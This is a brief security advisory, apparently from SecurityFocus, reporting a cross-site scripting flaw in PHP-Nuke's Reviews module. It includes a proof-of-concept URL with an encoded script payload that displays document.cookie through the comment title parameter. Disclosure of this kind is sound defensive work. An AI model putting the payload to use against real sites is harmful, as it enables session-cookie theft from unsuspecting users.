PHP-Nuke 'Reviews' Module Cross-Site Scripting Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%2528document.cookie);%253c/script>


 

Privacy Statement
Copyright 2010, SecurityFocus